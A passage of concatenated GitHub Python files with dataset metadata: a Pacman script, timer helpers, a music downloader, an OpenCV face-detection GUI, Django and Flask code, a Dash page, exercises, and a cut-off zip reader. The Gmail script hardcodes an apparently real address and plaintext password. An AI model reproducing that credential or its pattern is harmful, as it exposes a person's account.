índice [0]\n for c in range(TAMANHO_GRID): # percorre as colunas do jogo - índice [1]\n if l == pos_pacman[0] and c == pos_pacman[1]:\n print(pacman_formato, end='') # Imprime a forma atual do Pacman no grid\n elif l == pos_comida[0] and c == pos_comida[1]:\n print(COMIDA, end='') # Imprime a comida do grid\n else:\n print('.', end='')\n print()\n\n # Função para mover o Pacman em direção à comida\n def mover_pacman():\n if pos_pacman[0] < pos_comida[0]:\n pos_pacman[0] += 1\n elif pos_pacman[0] > pos_comida[0]:\n pos_pacman[0] -= 1\n elif pos_pacman[1] < pos_comida[1]:\n pos_pacman[1] += 1\n elif pos_pacman[1] > pos_comida[1]:\n pos_pacman[1] -= 1\n\n # Loop principal do jogo\n while True:\n imprimir_grid()\n mover_pacman()\n\n # Altera a forma do Pacman para a próxima forma na lista\n pacman_formato = PACMAN[(PACMAN.index(pacman_formato) + 1) % len(PACMAN)]\n\n if pos_pacman == pos_comida:\n pos_comida = [randint(0, TAMANHO_GRID - 1), randint(0, TAMANHO_GRID - 1)]\n sleep(TEMPO_DA_INTERACAO)","repo_name":"fhvol/projetoADS-AV2","sub_path":"pacman.py","file_name":"pacman.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20723847246","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on : 2019/03/07 14:21:04 JST.\nLast Change: 2019/07/05 22:52:10 JST.\n\n\n時間計測を簡単に行うことが出来る\nReference\n- https://qiita.com/tag1216/items/e1e3c565a2bf8dbc7f86\nエラーの例外処理\n- https://blog.amedama.jp/entry/2015/10/02/234946\n\n@author: Koki Obinata\n\"\"\"\nimport time\nfrom contextlib import contextmanager\nfrom collections import defaultdict\n\n\n@contextmanager\ndef single_timer(label):\n \"\"\"\n 処理の時間を計測\n\n Usage\n -----\n with single_timer('some_process'):\n time.sleep(0.1)\n\n Parameters\n ----------\n label : str\n 計測した処理時間を表示する際の名前\n \"\"\"\n start = time.time()\n try:\n yield\n finally:\n end = time.time()\n print('{}: {:.4f}'.format(label, end-start))\n\n\n@contextmanager\ndef timer_for_each():\n \"\"\"\n forループの中などで,処理ごとに別々に時間を計測\n\n Usage\n -----\n with timer_for_each() as timer:\n for _ in range(10):\n with timer('process1'):\n time.sleep(0.1)\n\n with timer('process2'):\n time.sleep(0.2)\n\n Parameters\n ----------\n label : str\n 計測した処理時間を表示する際の名前\n \"\"\"\n times = defaultdict(float)\n\n @contextmanager\n def timer(label):\n start = time.time()\n try:\n yield\n finally:\n end = time.time()\n times[label] += end - start\n\n yield timer\n\n for label, t in times.items():\n print('{}: {:.4f}'.format(label, t))\n\n\n@contextmanager\ndef timer_for_total(total_label):\n \"\"\"\n forループの中などで,処理ごとに別々に時間を計測し,\n 最後に全体の処理時間を表示\n\n Usage\n -----\n with timer_for_total('Total time') as timer:\n for _ in range(10):\n\n with timer('process1'):\n time.sleep(0.1)\n\n with timer('process2'):\n time.sleep(0.2)\n\n Parameters\n ----------\n total_label : str\n 全体の処理時間を表示する際の名前\n\n label : str\n 計測した処理時間を表示する際の名前\n \"\"\"\n times = defaultdict(float)\n\n @contextmanager\n def timer(label):\n start = time.time()\n try:\n yield\n finally:\n end = time.time()\n times[label] += end - start\n\n with timer(total_label):\n yield timer\n\n for label, t in times.items():\n if label != total_label:\n print('{}: {:.3f}'.format(label, t))\n print('{}: {:.3f}'.format(total_label, times[total_label]))\n\n\nif __name__ == '__main__':\n # 1種類の処理時間\n with single_timer('for loop'):\n MOD = 10**9 + 7\n a = 0\n for i in range(10**6):\n a += i\n a %= MOD\n\n # 各処理の処理時間\n with timer_for_each() as timer:\n for _ in range(10):\n with timer('処理1'):\n time.sleep(0.1)\n\n with timer('処理2'):\n time.sleep(0.2)\n\n # 各処理 + 全体の処理時間\n with timer_for_total('全体') as timer:\n for _ in range(10):\n with timer('処理1'):\n time.sleep(0.1)\n\n with timer('処理2'):\n time.sleep(0.2)\n\n # 例外時の処理\n with single_timer('Error handling'):\n print(\"Let's raise error\")\n raise Exception('Error occured!')\n","repo_name":"IkokObi/Reference","sub_path":"Python/context_manager/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3371684827","text":"# /usr/bin/env python\n# -*- coding: utf-8 -*-\n# author = 'Han Kai'\nimport requests,re\nimport urllib.request\n\ndef getResponse(url, headers):\n try:\n response = requests.get(url=url, headers=headers)\n if response.status_code == 200:\n return response\n return None\n except Exception as e:\n return None\n\ndef getSongname(songid):\n try:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'\n }\n url = 'https://music.163.com/song?id={}'.format(songid)\n html = getResponse(url, headers=headers).text\n # print(html)\n title = re.findall('(.*?)', html, re.S)\n print('----------------')\n print(title)\n name = title[0].split('-')[0]\n return name.strip()\n except:\n print(\"获取歌名失败\")\n\nif __name__ == '__main__':\n songid = input(\"请输入要下载的歌曲id:\")\n url = 'http://music.163.com/song/media/outer/url?id={}'.format(int(songid))\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'\n }\n download_url = getResponse(url, headers).url\n Songname = getSongname(int(songid))\n print(\"下载的地址:\",download_url)\n print(\"下载的歌曲:\", Songname)\n #和with open类似,这个方法可以根据地址另存为\n urllib.request.urlretrieve(download_url, Songname + '.mp3')\n\n","repo_name":"hanshoukai/Python-","sub_path":"Python实用小脚本/网易云根据歌曲id下载.py","file_name":"网易云根据歌曲id下载.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6016511591","text":"from tkinter import *\r\nimport tkinter as tk\r\nimport cv2\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter import filedialog\r\nimport datetime\r\n\r\n\r\nclass MainGUI:\r\n def __init__(self, root) -> None:\r\n # BUTTON ON/OFF STATES\r\n self.isDetectEyes = False\r\n self.isDetectFace = False\r\n self.isDetectSmile = False\r\n self.isDetectCat = False\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = False\r\n self.isImageSelected = False\r\n\r\n # DEFAULT IMAGE WHEN NO IMAGE/VIDEO SOURCE IS USED\r\n self.defaultFrameImage = PhotoImage(file=r\"./icons/need_image.png\")\r\n\r\n # RESIZING ICONS TO A SMALLER SIZE\r\n iconWidth = 1 # Icons will resize 1/n of the original Icon Image\r\n iconHeight = 1\r\n eyeIcon = PhotoImage(\r\n file=r\"./icons/eye.png\").subsample(iconWidth, iconHeight)\r\n faceIcon = PhotoImage(\r\n file=r\"./icons/face-detection.png\").subsample(iconWidth, iconHeight)\r\n smileIcon = PhotoImage(\r\n file=r\"./icons/smile.png\").subsample(iconWidth, iconHeight)\r\n catIcon = PhotoImage(\r\n file=r\"./icons/cat.png\").subsample(iconWidth, iconHeight)\r\n webCamIcon = PhotoImage(\r\n file=r\"./icons/webcam.png\").subsample(iconWidth, iconHeight)\r\n videoIcon = PhotoImage(\r\n file=r\"./icons/video.png\").subsample(iconWidth, iconHeight)\r\n imageIcon = PhotoImage(\r\n file=r\"./icons/image.png\").subsample(iconWidth, iconHeight)\r\n stopIcon = PhotoImage(\r\n file=r\"./icons/stop-button.png\").subsample(iconWidth, iconHeight)\r\n captureIcon = PhotoImage(\r\n file=r\"./icons/photo-capture.png\").subsample(iconWidth, iconHeight)\r\n\r\n # MAIN WINDOW\r\n self.root = root\r\n self.root.title(\"Final Project\")\r\n self.root.configure(bg=\"#4DBF85\")\r\n self.root.option_add(\"*font\", \"Arial 12\")\r\n self.root.resizable(False, False)\r\n\r\n # IMAGE/VIDEO CANVAS\r\n imageFrame = Frame(self.root)\r\n imageFrame.grid(row=0, column=0, padx=10, pady=10)\r\n self.labelImage = Label(imageFrame)\r\n self.labelImage.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n # INDIVIDUAL FRAMES FOR GROUPED BUTTONS FOR BETTER LAYOUT\r\n buttonsFrame = Frame(self.root, width=650, height=400)\r\n buttonsFrame.grid(row=0, column=1, padx=10, pady=5)\r\n\r\n sourcesButtonsFrame = Frame(buttonsFrame)\r\n detectButtonsFrame = Frame(buttonsFrame)\r\n snapshotButtonsFrame = Frame(buttonsFrame)\r\n\r\n sourcesButtonsFrame.grid(row=1, column=0)\r\n detectButtonsFrame.grid(row=3, column=0)\r\n snapshotButtonsFrame.grid(row=5, column=0)\r\n\r\n # BUTTONS\r\n # SOURCE BUTTONS\r\n self.buttonUseWebCam = Button(\r\n sourcesButtonsFrame, width=80, text=\"Webcam\", image=webCamIcon,\r\n compound=TOP, command=self.start_webcam)\r\n self.buttonUploadVideo = Button(\r\n sourcesButtonsFrame, width=80, text=\"Video\", image=videoIcon,\r\n compound=TOP, command=self.upload_video)\r\n self.buttonUploadImage = Button(\r\n sourcesButtonsFrame, width=80, text=\"Image\", image=imageIcon,\r\n compound=TOP, command=self.upload_image)\r\n\r\n # DETECTION BUTTONS\r\n self.buttonEyes = Button(\r\n detectButtonsFrame, text=\"Eyes\", image=eyeIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectEyes, 'isDetectEyes', self.buttonEyes))\r\n self.buttonFace = Button(\r\n detectButtonsFrame, text=\"Face\", image=faceIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectFace, 'isDetectFace', self.buttonFace))\r\n self.buttonSmile = Button(\r\n detectButtonsFrame, text=\"Smile\", image=smileIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectSmile, 'isDetectSmile', self.buttonSmile))\r\n self.buttonCat = Button(\r\n detectButtonsFrame, text=\"Cats\", image=catIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectCat, 'isDetectCat', self.buttonCat))\r\n\r\n # MISC BUTTONS\r\n self.buttonSnapShot = Button(\r\n snapshotButtonsFrame, text=\"SnapShot\", image=captureIcon, width=140, state=DISABLED,\r\n compound=LEFT, command=lambda: SaveSnapShotWindow(self.root, self.filteredFrame))\r\n self.buttonStop = Button(\r\n snapshotButtonsFrame, text=\"Stop\", image=stopIcon, width=140,\r\n compound=LEFT, command=self.stop_playing)\r\n\r\n # BUTTON LAYOUT\r\n Label(buttonsFrame, text=\"Pick a Source\").grid(\r\n row=0, column=0, pady=10)\r\n self.buttonUseWebCam.grid(row=1, column=0, padx=5, pady=5)\r\n self.buttonUploadVideo.grid(row=1, column=1, padx=5, pady=5)\r\n self.buttonUploadImage.grid(row=1, column=2, padx=5, pady=5)\r\n\r\n Label(buttonsFrame, text=\"Pick a Detection\").grid(\r\n row=2, column=0, pady=10)\r\n self.buttonEyes.grid(row=0, column=0, padx=5, pady=5)\r\n self.buttonFace.grid(row=1, column=0, padx=5, pady=5)\r\n self.buttonSmile.grid(row=0, column=1, padx=5, pady=5)\r\n self.buttonCat.grid(row=1, column=1, padx=5, pady=5)\r\n\r\n Label(buttonsFrame, text=\"Misc\").grid(\r\n row=4, column=0, pady=10)\r\n self.buttonSnapShot.grid(row=0, column=0, padx=5, pady=5)\r\n self.buttonStop.grid(row=0, column=1, padx=5, pady=5)\r\n\r\n # DISPLAY DEFAULT IMAGE UPON LAUNCH OR WHEN STOP BUTTON IS PRESSED\r\n self.labelImage.configure(image=self.defaultFrameImage)\r\n\r\n # CUSTOMIZE THE \"X\" BUTTON OF A WINDOW TO CLOSE IT WITHOUT ERROR\r\n # When the user pressed the X button on a window, this function will suspend all running functions before closing/destroying the window\r\n self.root.protocol(\"WM_DELETE_WINDOW\", lambda: (\r\n self.stop_playing(), self.root.destroy()))\r\n\r\n self.root.mainloop()\r\n\r\n def start_webcam(self):\r\n # Stop Everything if there is any\r\n self.stop_playing()\r\n\r\n # State that the program is using the Web Cam as source\r\n self.isUsingWebCam = True\r\n self.isPlayingVideo = False\r\n self.isImageSelected = False\r\n self.buttonUseWebCam.configure(state=DISABLED)\r\n self.buttonSnapShot.configure(state=NORMAL)\r\n\r\n # Opens the Web cam\r\n self.webCamCapture = cv2.VideoCapture(0, cv2.CAP_DSHOW)\r\n\r\n self.cycle_frames()\r\n\r\n def upload_image(self):\r\n # Stop Everything if there is any\r\n self.stop_playing()\r\n\r\n # Spawns a window to choose a file, if a file was not selected the function will stop\r\n filePath = filedialog.askopenfilename(title=\"Select image file\", filetypes=(\r\n (\"jpg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\r\n if filePath == \"\":\r\n return\r\n # Convert / path to \\\\ for Windows to be able to read\r\n self.convertedFilePath = filePath.replace('/', \"\\\\\\\\\")\r\n\r\n # State that the program is using an Image as source\r\n self.isImageSelected = True\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = False\r\n self.buttonSnapShot.configure(state=NORMAL)\r\n\r\n self.cycle_frames()\r\n\r\n def upload_video(self):\r\n # Stop Everything if there is any\r\n self.stop_playing()\r\n\r\n # Spawns a window to choose a file, if a file was not selected the function will stop\r\n filePath = filedialog.askopenfilename(title=\"Select video file\", filetypes=(\r\n (\"mp4 files\", \"*.mp4\"), (\"all files\", \"*.*\")))\r\n if filePath == \"\":\r\n return\r\n\r\n # Convert / path to \\\\ for Windows to be able to read\r\n convertedFilePath = filePath.replace('/', \"\\\\\\\\\")\r\n\r\n self.video = cv2.VideoCapture(convertedFilePath)\r\n\r\n # State that the program is using a Video as source\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = True\r\n self.isImageSelected = False\r\n self.buttonSnapShot.configure(state=NORMAL)\r\n\r\n self.cycle_frames()\r\n\r\n def detect_button_click(self, buttonState, instanceName, button):\r\n if buttonState:\r\n # Sets the button to be Unpressed\r\n setattr(self, instanceName, False)\r\n button.config(relief=RAISED)\r\n\r\n else:\r\n # Sets the button to be Pressed\r\n setattr(self, instanceName, True)\r\n button.config(relief=SUNKEN)\r\n\r\n # Conditional statement for when an Image is the source, every click of the button updates the image\r\n if ((not self.isUsingWebCam) & (not self.isPlayingVideo)):\r\n if self.isImageSelected:\r\n self.cycle_frames()\r\n\r\n def cycle_frames(self):\r\n if self.isPlayingVideo | self.isUsingWebCam:\r\n while True:\r\n ret = 0\r\n if self.isUsingWebCam:\r\n ret, frame = self.webCamCapture.read()\r\n # Flips the webcam output to act like a mirror\r\n frame = cv2.flip(frame, 1)\r\n\r\n if self.isPlayingVideo:\r\n ret, frame = self.video.read()\r\n\r\n if not ret: # Stops the while loop when the video/webcam has no more frames or have been stopped\r\n break\r\n #\r\n self.show_image_on_label(frame)\r\n\r\n if self.isImageSelected:\r\n self.image = cv2.imread(self.convertedFilePath)\r\n self.show_image_on_label(self.image)\r\n\r\n def show_image_on_label(self, frame):\r\n # Apply the boxes and convert the image from BGR to RGB\r\n # This is the variable that will be used when clicking the snapshot button\r\n self.filteredFrame = self.detection_applier(frame)\r\n cv2image = cv2.cvtColor(self.filteredFrame, cv2.COLOR_BGR2RGB)\r\n\r\n # Converts CV2 image to PIL image that tkinter can read\r\n img_update = ImageTk.PhotoImage(Image.fromarray(cv2image))\r\n\r\n # Configure the label to show the PIL image in it\r\n self.labelImage.configure(image=img_update)\r\n self.labelImage.image = img_update\r\n self.labelImage.update()\r\n\r\n def detection_applier(self, frame):\r\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n\r\n # Configs of when drawing a text on the frames/images\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n fontScale = 0.7\r\n fontBold = 2\r\n\r\n faceCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_frontalface_default.xml\")\r\n eyeCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_eye.xml\")\r\n smileCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_smile.xml\")\r\n catFaceCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_frontalcatface.xml\")\r\n\r\n if (self.isDetectFace):\r\n # WHEN A FACE IS DETECTED, ONLY THE EYES AND SMILE IN THE FACE ROI WILL BE BOXED\r\n detectedFaces = faceCascade.detectMultiScale(gray, 1.3, 5)\r\n for (x, y, w, h) in detectedFaces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n cv2.putText(frame, 'Face', (x, y), font,\r\n fontScale, (0, 255, 0), fontBold)\r\n\r\n # Region of Interest of the Face\r\n roi_gray = gray[y:y+h, x:x+w]\r\n roi_color = frame[y:y+h, x:x+w]\r\n\r\n if self.isDetectEyes:\r\n eyes = eyeCascade.detectMultiScale(roi_gray, 1.3, 25)\r\n for (ex, ey, ew, eh) in eyes:\r\n cv2.rectangle(roi_color, (ex, ey),\r\n (ex+ew, ey+eh), (0, 0, 255), 2)\r\n cv2.putText(roi_color, 'Eyes', (ex, ey),\r\n font, fontScale, (0, 0, 255), fontBold)\r\n\r\n if self.isDetectSmile:\r\n smiles = smileCascade.detectMultiScale(\r\n roi_gray, 1.8, 25)\r\n for (sx, sy, sw, sh) in smiles:\r\n cv2.rectangle(roi_color, (sx, sy),\r\n ((sx + sw), (sy + sh)), (255, 0, 0), 2)\r\n cv2.putText(roi_color, 'Smile', (sx, sy),\r\n font, fontScale, (255, 0, 0), fontBold)\r\n\r\n if (self.isDetectEyes & (not self.isDetectFace)):\r\n\r\n detectedEyes = eyeCascade.detectMultiScale(gray, 1.3, 25)\r\n for (x, y, w, h) in detectedEyes:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\r\n cv2.putText(frame, 'Eyes', (x, y),\r\n font, fontScale, (0, 0, 255), fontBold)\r\n\r\n if (self.isDetectSmile & (not self.isDetectFace)):\r\n\r\n detectedSmiles = smileCascade.detectMultiScale(gray, 1.8, 20)\r\n for (x, y, w, h) in detectedSmiles:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (225, 0, 0), 2)\r\n cv2.putText(frame, 'Smile', (x, y),\r\n font, fontScale, (255, 0, 0), fontBold)\r\n\r\n if self.isDetectCat:\r\n\r\n detectedCats = catFaceCascade.detectMultiScale(gray, 1.3, 5)\r\n for (x, y, w, h) in detectedCats:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 102, 255), 2)\r\n cv2.putText(frame, 'Cat', (x, y),\r\n font, fontScale, (0, 102, 255), fontBold)\r\n\r\n return frame\r\n\r\n def stop_playing(self):\r\n # Releases either the webcam of the video source\r\n if self.isUsingWebCam:\r\n self.webCamCapture.release()\r\n if self.isPlayingVideo:\r\n self.video.release()\r\n\r\n # Set the default image on the image canvas\r\n self.labelImage.configure(image=self.defaultFrameImage)\r\n\r\n # Change button states accordingly\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = False\r\n self.isImageSelected = False\r\n self.buttonSnapShot.configure(state=DISABLED)\r\n self.buttonUseWebCam.configure(state=NORMAL)\r\n\r\n\r\nclass SaveSnapShotWindow:\r\n def __init__(self, root, filteredFrame) -> None:\r\n self.saveWindow = Toplevel(root)\r\n self.saveWindow.title(\"Save SnapShot\")\r\n self.saveWindow.resizable(False, False)\r\n self.saveWindow.option_add(\"*font\", \"Arial 12\")\r\n\r\n # IMAGE/VIDEO CANVAS\r\n self.imageFrame = Frame(self.saveWindow)\r\n self.labelImage = Label(self.imageFrame)\r\n self.imageFrame.pack()\r\n self.labelImage.grid(row=0, column=0, padx=10, pady=10)\r\n\r\n # SEPARATE FRAMES FOR THE BUTTONS AND TEXT FIELD\r\n changeFileNameFrame = Frame(self.saveWindow)\r\n changeFileNameFrame.pack()\r\n buttonFrame = Frame(self.saveWindow)\r\n buttonFrame.pack()\r\n\r\n # TEXTFIELD FOR THE FILE NAME\r\n self.entryboxSaveAs = Entry(changeFileNameFrame, width=25)\r\n labelFileExtension = Label(changeFileNameFrame, text=\".jpg\")\r\n\r\n # SAVE AND CANCEL BUTTONS\r\n self.buttonSave = Button(\r\n buttonFrame, text=\"Save\", command=self.save, bg='#4764ff', fg='white', width=15, height=1)\r\n self.buttonCancel = Button(\r\n buttonFrame, text=\"Cancel\", command=self.close_window_or_cancel, bg='#3c3c3c', fg='white', width=15, height=1)\r\n\r\n # TEXTFIELD AND BUTTONS LAYOUT\r\n Label(changeFileNameFrame, text=\"Set Filename:\").grid(row=0, column=0)\r\n self.entryboxSaveAs.grid(row=1, column=0)\r\n labelFileExtension.grid(row=1, column=1, sticky=W)\r\n self.buttonSave.grid(row=0, column=1, padx=20, pady=10)\r\n self.buttonCancel.grid(row=0, column=0, padx=20, pady=10)\r\n #\r\n #\r\n # SHOW THE IMAGE ON THE IMAGE CANVAS\r\n self.snapShotImage = filteredFrame\r\n self.show_image_on_label(self.snapShotImage)\r\n\r\n # GETS THE CURRENT TIME AND PLACE IT IN THE TEXTFIELD AS A DEFAULT FILE NAME\r\n self.timeString = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\r\n self.entryboxSaveAs.insert(INSERT, self.timeString)\r\n\r\n # GRABS THE FOCUS ON THIS WINDOW SO THAT THE MAIN WINDOW CANNOT BE PRESSED UNTIL THIS WINDOW IS CLOSED\r\n self.saveWindow.grab_set()\r\n\r\n # MODIFIED THE X BUTTON FOR A SAFE CLOSE\r\n self.saveWindow.protocol(\r\n \"WM_DELETE_WINDOW\", self.close_window_or_cancel)\r\n\r\n def save(self):\r\n # Gets the file name from the textbox\r\n saveAsFileName = self.entryboxSaveAs.get()\r\n\r\n # If the user did not type any name, it will default to the current time\r\n if saveAsFileName == \"\":\r\n saveAsFileName = self.timeString\r\n\r\n # Writes/Saves the image that was passed through the class not the downscale thumbnail/image\r\n cv2.imwrite(f'./snapshots/{saveAsFileName}.jpg', self.snapShotImage)\r\n\r\n self.close_window_or_cancel()\r\n\r\n def close_window_or_cancel(self):\r\n self.saveWindow.grab_release()\r\n # Safely destroy the toplevel without affecting the root window\r\n self.saveWindow.destroy()\r\n\r\n def show_image_on_label(self, frame):\r\n # Apply the boxes and convert the image from BGR to RGB\r\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n cv2image = self.downscale_image(cv2image)\r\n\r\n # Converts CV2 image to PIL image that tkinter can read\r\n img_update = ImageTk.PhotoImage(Image.fromarray(cv2image))\r\n\r\n # Configure the label to show the PIL image in it\r\n self.labelImage.configure(image=img_update)\r\n self.labelImage.image = img_update\r\n self.labelImage.update()\r\n\r\n def downscale_image(self, image):\r\n scale_percent = 70 # Resize the image to n%\r\n width = int(image.shape[1] * scale_percent / 100)\r\n height = int(image.shape[0] * scale_percent / 100)\r\n dim = (width, height)\r\n\r\n # Return the resized image\r\n return cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\r\n\r\n\r\nroot = tk.Tk()\r\nMainGUI(root)\r\n","repo_name":"Mark-A14/haarscade-with-tkinter-gui","sub_path":"finalProject.py","file_name":"finalProject.py","file_ext":"py","file_size_in_byte":18205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17418816337","text":"from django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\n\nfrom product.utils import unique_slug_generator\nfrom product.models.datamodel import Incoming, Outgoing\n\n\n\n@receiver(pre_save, sender=Incoming)\ndef product_pre_save_slug(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n \n\n\n@receiver(post_save, sender=Outgoing)\ndef update_incoming(sender, instance, **kwargs):\n product_instance = Incoming.objects.get(pk=instance.product.id)\n print(product_instance.name)\n product_instance.stock = 'Sold'\n \n product_instance.save()\n ","repo_name":"milanalay/AkalaRecondition","sub_path":"product/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23948928527","text":"import smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.header import Header\r\n\r\nsmtp=smtplib.SMTP(\"smtp.gmail.com\",587)\r\nsmtp.ehlo()\r\nsmtp.starttls()\r\nsmtp.login(\"yujunlee7862@gmail.com\",\"dkgur3@@\")\r\n\r\nm=\"yujunlee7862@gmail.com\"\r\ny=\"yujunlee7862@gmail.com\"\r\nsubject=\"hellow\"\r\nmessage=\"dd\"\r\nmsg=MIMEText(message.encode('utf-8'),_subtype='plain',_charset='uft-8')\r\nmsg['subject']=Header(subject.encode('utf-8'),'utf-8')\r\nmsg['From']=m\r\nmsg['To']=y\r\nsmtp.sendmail(m, y, msg.as_string())\r\nsmtp.quit()\r\n","repo_name":"yujunlee12/gmail","sub_path":"ㅇ.py","file_name":"ㅇ.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18528546394","text":"# Desafio 50:\n# Desenvolva um programa que leia SEIS NÚMEROS INTEIROS\n# e mostre a soma apenas daqueles que foram PARES. Se o\n# valor digitado for ÍMPAR, desconsidere-o.\n\nsoma = 0\ncont = 0\nfor c in range(1, 7):\n num = int(input('Digite o {}⁰ número: '.format(c)))\n if num % 2 == 0:\n soma += num\n cont += 1\nprint('Você informou {} número(s) PARE(S) e a soma foi {}.'.format(cont, soma))\n","repo_name":"wmarenga/Python_Learning","sub_path":"Basic_Python_course_Course_in_video/Mundo2_python3/Exercicio50.py","file_name":"Exercicio50.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10322470052","text":"from flask import (Blueprint, request)\nfrom . import models\n\nbp = Blueprint('reptile', __name__, url_prefix=\"/reptiles\")\n\n@bp.route('/', methods=['POST', 'GET'])\ndef index():\n # Return Reptiles Index\n if request.method == 'GET':\n reptiles_dict = {\n 'reptiles': []\n }\n # find all reptiles\n reptiles = models.Reptile.query.all()\n for row in reptiles:\n # JSON friendly dict format\n row_dict = {\n 'id': row.id,\n 'common_name': row.common_name,\n 'scientific_name': row.scientific_name,\n 'consevation_status': row.conservation_status,\n 'native_habitat': row.native_habitat,\n 'fun_fact': row.fun_fact\n }\n reptiles_dict['reptiles'].append(row_dict)\n return reptiles_dict\n\n # Add New Reptile\n elif request.method == 'POST':\n new_reptile = models.Reptile(\n common_name = request.form['common_name'],\n scientific_name = request.form['scientific_name'],\n conservation_status = request.form['conservation_status'],\n native_habitat = request.form['native_habitat'],\n fun_fact = request.form['fun_fact']\n )\n # JSON friendly dict format\n new_reptile_dict = {\n 'common_name': request.form['common_name'],\n 'scientific_name': request.form['scientific_name'],\n 'conservation_status': request.form['conservation_status'],\n 'native_habitat': request.form['native_habitat'],\n 'fun_fact': request.form['fun_fact']\n }\n # Add New Reptile to Database\n models.db.session.add(new_reptile)\n models.db.session.commit()\n\n # Print dictionary object on console and return on postman\n print(new_reptile_dict)\n return(new_reptile_dict)\n\n\n@bp.route('/')\ndef show(id):\n reptile = models.Reptile.query.filter_by(id=id).first()\n reptile_dict = {\n 'common_name': reptile.common_name,\n 'scientific_name': reptile.scientific_name,\n 'conservation_status': reptile.conservation_status,\n 'native_habitat': reptile.native_habitat,\n 'fun_fact': reptile.fun_fact\n }\n return reptile_dict","repo_name":"skim1127/Ball-Py-API","sub_path":"ballpy/reptile.py","file_name":"reptile.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6812576739","text":"import dash\nfrom dash import html, dcc\nimport dash_bootstrap_components as dbc\n\ndash.register_page(__name__, path='/')\n\n\nselect_existing = dbc.Col(\n html.Div(\n [\n html.H2(\"Select existing dataset\"),\n html.Hr(className=\"my-2\"),\n html.P(\n \"Use a previously onboarded dataset to run the topic modeling pipeline.\"\n ),\n dbc.Button(\"Go\", color=\"dark\", outline=True, href='/tm_data_selection'),\n ],\n className=\"h-100 p-4 m-1 border rounded-3\",\n ),\n md=6,\n)\n\nonboard_new = dbc.Col(\n html.Div(\n [\n html.H2(\"Onboard new data\"),\n html.Hr(className=\"my-2\"),\n html.P(\n \"Add a new corpus to the data registry.\"\n ),\n dbc.Button(\"Go\", color=\"dark\", outline=True, href='/')\n \n ],\n className=\"h-100 p-4 m-1 border rounded-3\",\n ),\n md=6,\n)\n\nhome_selection = dbc.Row(\n [select_existing, onboard_new],\n className=\"align-items-md-stretch\",\n style={\"margin-left\":\"3%\",\"margin-right\":\"3%\" }\n)\n\nlayout = html.Div(children=[\n home_selection\n])\n\n","repo_name":"DHARPA-Project/kiara_plugin.playground","sub_path":"examples/apps/dash/pages/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43671365687","text":"import string\nimport zipfile\nimport random\n\n\ndef check_sum():\n with open('rows.txt') as file:\n lines = file.readlines()\n sum_num = 0\n for line in lines:\n row = line.split('\\t')\n row = [int(i) for i in row]\n diff = max(row) - min(row)\n sum_num = sum_num + diff\n print(sum_num)\n return sum_num\n\n\ncheck_sum()\n\n\ndef read_zip_file():\n files = zipfile.ZipFile('zadanie_1_words.zip')\n\n for txt in files.infolist():\n single_file = files.open(txt)\n line_list = str(single_file.readlines())\n\n line_list = line_list.lower()\n print(line_list)\n signs = string.ascii_lowercase\n for sign in signs:\n amount_of_sign = line_list.count(sign)\n print(sign, amount_of_sign)\n\n\nread_zip_file()\n\n\ndef 